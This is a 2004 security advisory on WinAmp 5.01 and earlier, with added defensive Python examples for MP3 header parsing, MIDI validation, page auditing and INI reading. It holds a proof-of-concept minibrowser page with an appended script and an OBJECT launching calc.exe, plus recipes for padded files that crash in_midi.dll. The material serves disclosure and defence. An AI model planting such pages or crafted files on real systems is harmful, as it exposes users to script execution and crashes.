Message-ID: <000001c41240$b088d1a0$cb4db350@fucku>
From: theinsider at 012.net.il (Rafel Ivgi, The-Insider)
Subject: WinAmp <=5.01 - Multiple Vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Software: WinAmp
Vendor: NullSoft
http://www.nullsoft.com
http://www.winamp.com
Versions: <=5.01
Platforms: Windows
Bug: Multiple Vulnerabilities
Risk: Medium
Exploitation: Local
Date: 25 Feb 2004
Author: Rafel Ivgi, The-Insider
e-mail: the_insider@...l.com
web: http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1) Introduction
2) Bug
3) The Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============
1) Introduction
===============
Winamp is more than just a player. It's your window to the multimedia world.
From MP3s to streaming video, Winamp is the one place you go to feed your
audio/video habit. Winamp is one of the world's most common audio/video file
players.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
======
2) Bug
======
Faking File Details:
--------------------------
Adding a lot of '\x01' bytes to the *BEGINNING* of an MP3 file creates fake
file details.
The reported length of the MP3 increases, the file is reported as
copyrighted and original with a large number of frames and
an invalid emphasis value, and the song also loads with a delay.
Example:
Size: 123136633 bytes
Header found at: 7122 bytes
Length: 2565 seconds
MPEG 1.0 layer 1
384kbit, 98273 frames
44100Hz 2 Channel
CRCs: No
Copyrighted: Yes
Original: Yes
Emphasis: invalid
Adding a lot of '\x01' bytes to the *END* of an MP3 file creates different
fake file details.
The reported bitrate of the MP3 increases, the sample rate (Hz) decreases,
and upon play the .
Example:
Size: 123136873 bytes
Header found at: 4266 bytes
Length: 3420 seconds
MPEG 1.0 layer 1
288kbit, 95013 frames
32000Hz Stereo
CRCs: No
Copyrighted: No
Original: No
Emphasis: CITT j.17
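Both sets of fake details come from a decoder that trusts the first header-looking word it finds and then estimates everything else from file size. The following is an added example, not code from the advisory or from Nullsoft: a strict MPEG audio frame-header scanner that rejects reserved field values (including the reserved emphasis value that WinAmp reports as "invalid"), only trusts a sync word when a consistent header sits exactly one frame later, and measures length by walking frames instead of dividing file size by frame length. The sample input is constructed inline: 0x01 padding as in the advisory, a stray header-looking word planted inside the padding, then three synthetic MPEG1 Layer III frames with zero payload. It handles MPEG1 and MPEG2 only; MPEG 2.5 is left out.

```python
"""Strict MPEG audio frame-header scanner (added example, not WinAmp's code)."""
import struct

# Bitrate tables in kbit/s, indexed by the 4-bit bitrate index (0 = free format, 15 = reserved).
BITRATES_KBPS = {
    (1, 1): [0, 32, 64, 96, 128, 160, 192, 224, 256, 288, 320, 352, 384, 416, 448],
    (1, 2): [0, 32, 48, 56, 64, 80, 96, 112, 128, 160, 192, 224, 256, 320, 384],
    (1, 3): [0, 32, 40, 48, 56, 64, 80, 96, 112, 128, 160, 192, 224, 256, 320],
    (2, 1): [0, 32, 48, 56, 64, 80, 96, 112, 128, 144, 160, 176, 192, 224, 256],
    (2, 2): [0, 8, 16, 24, 32, 40, 48, 56, 64, 80, 96, 112, 128, 144, 160],
    (2, 3): [0, 8, 16, 24, 32, 40, 48, 56, 64, 80, 96, 112, 128, 144, 160],
}
SAMPLE_RATES = {1: (44100, 48000, 32000), 2: (22050, 24000, 16000)}
EMPHASIS = {0: "none", 1: "50/15 ms", 2: "invalid", 3: "CCIT J.17"}


def parse_header(buf, off):
    """Decode the 4-byte frame header at buf[off:]; None if sync or a reserved value fails."""
    if off + 4 > len(buf):
        return None
    h = struct.unpack_from(">I", buf, off)[0]
    if (h >> 21) != 0x7FF:                                  # 11-bit sync word
        return None
    version_bits, layer_bits = (h >> 19) & 3, (h >> 17) & 3
    if version_bits not in (2, 3) or layer_bits == 0:       # reserved version/layer, MPEG 2.5 unhandled
        return None
    version, layer = (1 if version_bits == 3 else 2), 4 - layer_bits
    bitrate_idx, srate_idx = (h >> 12) & 0xF, (h >> 10) & 3
    if bitrate_idx in (0, 15) or srate_idx == 3:            # free-format and reserved values rejected
        return None
    bitrate = BITRATES_KBPS[(version, layer)][bitrate_idx] * 1000
    srate = SAMPLE_RATES[version][srate_idx]
    padding = (h >> 9) & 1
    if layer == 1:
        frame_len, samples = (12 * bitrate // srate + padding) * 4, 384
    elif version == 1 or layer == 2:
        frame_len, samples = 144 * bitrate // srate + padding, 1152
    else:
        frame_len, samples = 72 * bitrate // srate + padding, 576
    return {"version": version, "layer": layer, "bitrate": bitrate, "sample_rate": srate,
            "frame_len": frame_len, "samples": samples, "emphasis": EMPHASIS[h & 3]}


def _consistent(a, b):
    return (a["version"], a["layer"], a["sample_rate"]) == (b["version"], b["layer"], b["sample_rate"])


def find_first_frame(buf, confirm=True):
    """Return (offset, header) of the first trusted frame, or None. With confirm=True a header
    is trusted only if its emphasis is valid and a consistent header follows one frame later."""
    for off in range(len(buf) - 3):
        hdr = parse_header(buf, off)
        if hdr is None:
            continue
        if not confirm:
            return off, hdr                                 # lenient: first sync word wins
        if hdr["emphasis"] == "invalid":
            continue
        nxt = parse_header(buf, off + hdr["frame_len"])
        if nxt is not None and _consistent(hdr, nxt):
            return off, hdr
    return None


def walk_frames(buf, start):
    """Count consecutive consistent frames from start; returns (frames, seconds)."""
    first = parse_header(buf, start)
    if first is None:
        return 0, 0.0
    count, off = 0, start
    while True:
        hdr = parse_header(buf, off)
        if hdr is None or not _consistent(first, hdr):
            break
        count += 1
        off += hdr["frame_len"]
    return count, count * first["samples"] / first["sample_rate"]


def naive_length(buf, hdr):
    """The size-based estimate a lenient player makes: every byte is assumed to be audio."""
    frames = len(buf) // hdr["frame_len"]
    return frames, frames * hdr["samples"] / hdr["sample_rate"]


# Constructed sample, not a real file: MPEG1 Layer III, 128 kbit/s, 44100 Hz, stereo, no emphasis.
FRAME_HDR = bytes([0xFF, 0xFB, 0x90, 0x00])
FRAME = FRAME_HDR + b"\x00" * 413          # 144 * 128000 // 44100 == 417 bytes per frame


def make_sample(prefix=5000, frames=3, suffix=100):
    """0x01 padding as in the advisory, a stray header word planted in it, then real frames."""
    pad = b"\x01" * prefix
    return pad[:1000] + FRAME_HDR + pad[1000:] + FRAME * frames + b"\x01" * suffix


if __name__ == "__main__":
    sample = make_sample()
    print("lenient scan trusts offset", find_first_frame(sample, confirm=False)[0])   # the decoy
    off, hdr = find_first_frame(sample)
    print("confirmed scan trusts offset", off)                                         # first real frame
    print("naive frames/length:", naive_length(sample, hdr))
    print("walked frames/length:", walk_frames(sample, off))
```

The lenient scan stops at the planted word at offset 1000; the confirmed scan skips it because nothing decodable sits 417 bytes later, and lands on the first real frame. Walking frames counts three, while the size-based estimate counts fifteen, which is the same mechanism by which padding inflates the reported length in the advisory.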
Crash/Buffer Overflow:
------------------------------
Changing a modified MP3 file's extension to ".mid" will cause a CRASH/
BUFFER OVERFLOW at "in_midi.dll".
Crash/Overflow = [choose a number] x '\x01' + [original mp3 file content] +
[choose a number] x '\x01' + ".mid".
screen capture: http://theinsider.deep-ice.com/images/winampbof.jpg
screen capture: http://theinsider.deep-ice.com/images/winampbof2.jpg
A similar overflow was found in the past by Core Security. This overflow
does not allow code execution; it is a null pointer crash. It can be seen
clearly when adding a "bugged" file using the "add --> dir" function (the
directory must contain more regular MP3 files).
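The crash happens because the input plug-in is chosen by file extension, so in_midi.dll receives bytes that are not a MIDI file at all. The following is an added example, not WinAmp's or Nullsoft's code: a content check that validates the Standard MIDI File header chunk (the "MThd" magic, its fixed length of 6, the format number, the track count and the time division) and the first "MTrk" chunk before a file is handed to a MIDI decoder, so a renamed MP3 is rejected rather than parsed. The two inputs are constructed inline; the decoder names returned by select_decoder are this example's own.

```python
"""Content-based decoder dispatch (added example; in_midi.dll's own logic is not known)."""
import struct


def looks_like_midi(data):
    """Return (ok, reason). A Standard MIDI File starts with an 'MThd' chunk of length 6
    carrying format (0-2), track count and time division, followed by an 'MTrk' chunk."""
    if len(data) < 18:
        return False, "shorter than a MIDI header plus first track chunk id"
    magic, length, fmt, ntrks, division = struct.unpack(">4sIHHH", data[:14])
    if magic != b"MThd":
        return False, "missing MThd magic"
    if length != 6:
        return False, f"unexpected header length {length}"
    if fmt > 2:
        return False, f"unknown format {fmt}"
    if ntrks == 0 or (fmt == 0 and ntrks != 1):
        return False, f"implausible track count {ntrks} for format {fmt}"
    if division == 0:
        return False, "zero time division"
    if data[14:18] != b"MTrk":
        return False, "first chunk after header is not MTrk"
    return True, "ok"


def select_decoder(filename, data):
    """Extension only nominates a decoder; the content check has the final say."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext in ("mid", "midi"):
        ok, reason = looks_like_midi(data)
        return ("midi", reason) if ok else ("reject", reason)
    return ("unknown", "no content check for extension " + repr(ext))


# Constructed inputs: a minimal valid format-0 MIDI file, and 0x01-padded MPEG audio renamed to .mid.
GOOD_MIDI = (b"MThd" + struct.pack(">IHHH", 6, 0, 1, 96)
             + b"MTrk" + struct.pack(">I", 4) + b"\x00\xff\x2f\x00")   # delta 0, End of Track
RENAMED_MP3 = b"\x01" * 64 + bytes([0xFF, 0xFB, 0x90, 0x00]) + b"\x00" * 32 + b"\x01" * 64


if __name__ == "__main__":
    print("song.mid (real MIDI):", select_decoder("song.mid", GOOD_MIDI))
    print("song.mid (renamed MP3):", select_decoder("song.mid", RENAMED_MP3))
```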
Minibrowser Compromise:
----------------------------------
The Winamp minibrowser (Alt+T)/(Alt+L) loads "winampmb.htm" by default.
Anyone who can modify "winampmb.htm" can add scripts to it; Winamp runs this
file with "LocalZone" access.
Example of a modified "winampmb.htm":
-------------- CUT HERE ----------------
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Winamp's Minibrowser</title>
</head>
<style type="text/css">
<!--
a:link
{
color:#0000FF;
}
a:visited
{
color:#0000FF;
}
a:hover
{
color:red;
}
a.test:link
{
color:red;
}
BODY
{
background-color: #FFFFFF;
font-family: Arial, Helvetica;
color:black;
}
.default
{
font-size:10pt;
}
.logo
{
font-family: Arial Black, Arial, Helvetica;
font-size: 13pt;
color: #FFC800;
filter: glow(color=#000000, strength=2);
height:1;
}
-->
</style>
<body topmargin="0" leftmargin="0" rightmargin="0" marginheight="0"
marginheight="0">
<table cellpadding="0" cellspacing="0" width="100%">
<tr><td style="background-color:#800000;" nowrap>
<div class="coffee logo"> WINAMP</div>
<div class="coffee logo"
style="margin-top: -24px;"> WINAMP</div>
<div class="coffee logo"
style="margin-top: -24px;"> WINAMP</div>
</td></tr>
<tr><td style="background-color:#FFC800;"
nowrap><table></table></td></tr>
</table>
<table width="96%" align="center">
<tr><td height="5" nowrap><table></table></td></tr>
<tr><td class="default">Welcome to the Minibrowser, connect to the
internet and check out the cool links below.</td></tr>
<tr><td height="5" nowrap><table></table></td></tr>
</table>
<table width="93%" cellpadding="5" cellspacing="0" style="border: 1px solid
#DDDDDD;" align="center">
<tr>
<td style="border: 1px solid #DDDDDD;background-color:#F7F7F7;">
<table cellpadding="0" cellspacing="0" border="0"
class="default">
<tr>
<td style="font-size:8pt;"><div
style="font-family:Verdana;font-size:13pt;"><a
href="http://www.shoutcast.com/waradio.phtml" target="outside"><b>Winamp
Radio</b></a></div>Free MP3 Internet Radio that you control.</td>
</tr>
<tr><td height="10" nowrap><table></table></td></tr>
<tr>
<td style="font-size:8pt;"><div
style="font-family:Verdana;font-size:13pt;"><a
href="http://www.winamp.com/skins/" target="outside"><b>Free
Skins</b></a></div>Give your Winamp a new look and feel.</td>
</tr>
<tr><td height="10" nowrap><table></table></td></tr>
<tr>
<td style="font-size:8pt;"><div
style="font-family:Verdana;font-size:13pt;"><a
href="http://www.winamp.com/plugins/" target="outside"><b>Free
Plug-ins</b></a></div>Add to what your Winamp can do. Add games, ability to
play new files, and more!</td>
</tr>
<tr><td height="10" nowrap><table></table></td></tr>
<tr>
<td style="font-size:8pt;"><div
style="font-family:Verdana;font-size:13pt;"><a
href="http://www.winamp.com/music/?mb=1" target="outside"><b>Grab Some
Music</b></a></div>Get some tunes from our sponsors, it's all free!</td>
</tr>
</table>
</td>
</tr>
</table>
<div align="center" class="default" style="font-size:.6em;">Copyright <a
href="http://www.nullsoft.com" target="outside">Nullsoft Inc.</a>
1997-2001</div>
</body>
</html>
<script>alert('xss')</script><OBJECT
CLASSID="CLSID:10000000-0000-0000-0000-000000000000"
CODEBASE="C:\windows\system32\calc.exe"></OBJECT>
-------------- CUT HERE ----------------
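The tampered file above differs from the shipped one only by what is appended after the closing </html> tag. As an added example (not code from the advisory or from Nullsoft), the following audit parses a minibrowser start page with Python's html.parser and flags what should never appear in a static page rendered with local-zone privileges: script elements, elements after </html>, event-handler or javascript: attributes, and object elements whose CODEBASE points at a local path. The two pages it runs on are constructed inline; the clean one is a cut-down stand-in for the original winampmb.htm, the tampered one appends the payload shown in the advisory.

```python
"""Static audit of a minibrowser start page (added example, not WinAmp's code)."""
import re
from html.parser import HTMLParser

# A CODEBASE that names a drive letter, a UNC share or a file: URL instead of a web origin.
LOCAL_PATH = re.compile(r"^\s*(?:[A-Za-z]:\\|\\\\|file:)", re.IGNORECASE)


class MinibrowserAudit(HTMLParser):
    """Collects (line, finding) pairs for content that does not belong in a static page."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self.after_html_close = False

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        line, _ = self.getpos()
        if self.after_html_close:
            self.findings.append((line, f"<{tag}> after </html>"))
        if tag == "script":
            self.findings.append((line, "inline script"))
        if tag == "object" and LOCAL_PATH.match(attrs.get("codebase", "")):
            self.findings.append((line, "object with local codebase " + attrs["codebase"]))
        for name, value in attrs.items():
            if name.startswith("on") or value.lower().lstrip().startswith("javascript:"):
                self.findings.append((line, f"script handler in attribute {name}"))

    def handle_endtag(self, tag):
        if tag == "html":
            self.after_html_close = True


def audit_minibrowser_page(html):
    """Return the list of findings for one page; an empty list means nothing suspicious."""
    parser = MinibrowserAudit()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed pages: a cut-down stand-in for the shipped file, and the same file with the
# advisory's appended payload.
CLEAN_PAGE = """<html><head><title>Winamp's Minibrowser</title></head>
<body><a href="http://www.winamp.com/skins/" target="outside">Free Skins</a></body></html>
"""
TAMPERED_PAGE = CLEAN_PAGE + """<script>alert('xss')</script><OBJECT
CLASSID="CLSID:10000000-0000-0000-0000-000000000000"
CODEBASE="C:\\windows\\system32\\calc.exe"></OBJECT>
"""


if __name__ == "__main__":
    print("clean page:", audit_minibrowser_page(CLEAN_PAGE))
    for line, finding in audit_minibrowser_page(TAMPERED_PAGE):
        print(f"tampered page, line {line}: {finding}")
```

A parse-based check like this is a complement to, not a substitute for, the two controls that actually close the issue: the file must not be writable by the account that runs the player, and a page loaded from the local file system should not be granted local-zone script privileges.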
Bugs:
-------
WinAmp/ini: If an empty value is located at "RecentURL1=", or if it
doesn't exist, then Winamp ignores the rest of the URLs...
Example:
RecentURL1=
RecentURL2=http://www.server2.com:8080
RecentURL3=http://www.server3.com:8080
RecentURL4=http://www.server4.com:8080
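The behaviour described above is what a reader gets from walking numbered keys RecentURL1, RecentURL2, ... and stopping at the first empty or absent one. As an added example (not WinAmp's code), the following contrasts that sequential reader with a tolerant one that collects every non-empty RecentURL<n> key in numeric order. The INI text is the advisory's example placed under a "[Winamp]" section header, which is an assumption made here for configparser's sake; the real section name in winamp.ini is not given by the advisory.

```python
"""Sequential versus tolerant reading of numbered INI keys (added example)."""
import configparser
import re

# Constructed from the advisory's example; the "[Winamp]" section header is assumed.
SAMPLE_INI = """[Winamp]
RecentURL1=
RecentURL2=http://www.server2.com:8080
RecentURL3=http://www.server3.com:8080
RecentURL4=http://www.server4.com:8080
"""


def _load(ini_text):
    cp = configparser.ConfigParser(interpolation=None)   # URLs may contain '%'
    cp.read_string(ini_text)
    return cp


def recent_urls_sequential(ini_text, section="Winamp"):
    """Walks RecentURL1, RecentURL2, ... and stops at the first empty or missing key,
    which is the behaviour the advisory describes."""
    cp = _load(ini_text)
    urls, n = [], 1
    while True:
        value = cp.get(section, f"RecentURL{n}", fallback="").strip()
        if not value:
            return urls
        urls.append(value)
        n += 1


def recent_urls_tolerant(ini_text, section="Winamp"):
    """Collects every RecentURL<n> key with a non-empty value, ordered by n, so a gap
    in the numbering does not hide the entries after it."""
    cp = _load(ini_text)
    found = []
    for key, value in cp.items(section):                  # configparser lower-cases keys
        m = re.fullmatch(r"recenturl(\d+)", key)
        if m and value.strip():
            found.append((int(m.group(1)), value.strip()))
    return [url for _, url in sorted(found)]


if __name__ == "__main__":
    print("sequential:", recent_urls_sequential(SAMPLE_INI))
    print("tolerant:  ", recent_urls_tolerant(SAMPLE_INI))
```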
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===========
3) The Code
===========
Fake MP3 file details = 10000 x '\x01' + [original mp3 file content] +
10000 x '\x01'.
Crash/Overflow = 10000 x '\x01' + [original mp3 file content] + 10000 x
'\x01' + ".mid".
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---
Rafel Ivgi, The-Insider - advisory#38.txt
http://theinsider.deep-ice.com
"Things that are unlikeable, are NOT impossible."